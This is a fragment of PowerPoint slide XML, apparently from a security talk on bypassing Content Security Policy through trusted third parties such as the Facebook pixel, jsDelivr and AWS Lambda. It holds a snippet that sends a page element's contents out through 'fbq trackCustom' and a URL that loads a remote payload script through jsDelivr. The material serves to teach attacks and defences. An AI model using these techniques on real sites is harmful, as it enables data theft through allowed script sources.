                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Objective #2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Method #1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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611441" y="2017618"/>
            <a:ext cx="7468721" cy="2908489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fbq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘1179785999289471'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fbq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trackCustom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyEvent-keyfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Secret ingredient is: '"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'secret-ingredient'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"'"</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3751316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2</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Facebook</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Profit 💸</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530962" y="266596"/>
            <a:ext cx="7468721" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D050EFAA-A621-E45D-6985-2019CFA6806D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587013" y="873240"/>
            <a:ext cx="7356617" cy="5197245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36067727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85D9A-CDB4-B7A3-6EEC-57713462E6C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="10348" t="45455" r="23198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353901" y="1259098"/>
            <a:ext cx="7484198" cy="4339804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695408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3</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JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delivr</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3746EE3E-7FDF-2FA5-2B58-387A1B120A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18006960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4975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400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demo 3 – JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delivr</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Storing the Payload (github.com or npmjs.com)</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16A00B2-FAA8-F6F1-4AE5-E90975D6212A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="20778" b="6863"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="302771" y="2090317"/>
            <a:ext cx="4391332" cy="4363902"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D77BB7C-2692-1A5C-F3C6-AAAE292B6CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="42222"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4996874" y="2283014"/>
            <a:ext cx="7028680" cy="3978508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7661F2E6-52B5-79B0-87C3-FF9A9B1E4534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6347012" y="2366682"/>
            <a:ext cx="3218329" cy="24204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0272943"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{6950BFC3-D8DA-4A85-94F7-54DA5524770B}">
      <p188:commentRel xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main" r:id="rId3"/>
    </p:ext>
  </p:extLs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3</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JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delivr</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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Profit 💸</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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1BE73CF-8926-7BCC-2694-A3E453F6ED04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5532560" y="1498604"/>
            <a:ext cx="5180032" cy="5075596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B0657AB-9B56-0521-43C6-7EDD38E93D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4656736" y="476140"/>
            <a:ext cx="72171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https://jsdelivr.keyfc.com/secret.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>source=https://cdn.jsdelivr.net/gh/felmoltor/bunchofjs/exec.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32966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4</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Amazon AWS</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US" sz="2000" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API Gateway + Lambda Function</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3746EE3E-7FDF-2FA5-2B58-387A1B120A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350805355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6783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9468-34E1-B11B-4856-DEDF65982B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSP Aimed to Tackle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761739C8-A8F0-52DB-59B2-27A8909B2264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS) 	🔀</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Clickjacking 				🖱️</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data Injection 			💉</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resulting in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data theft				💸</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sites Defacement		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
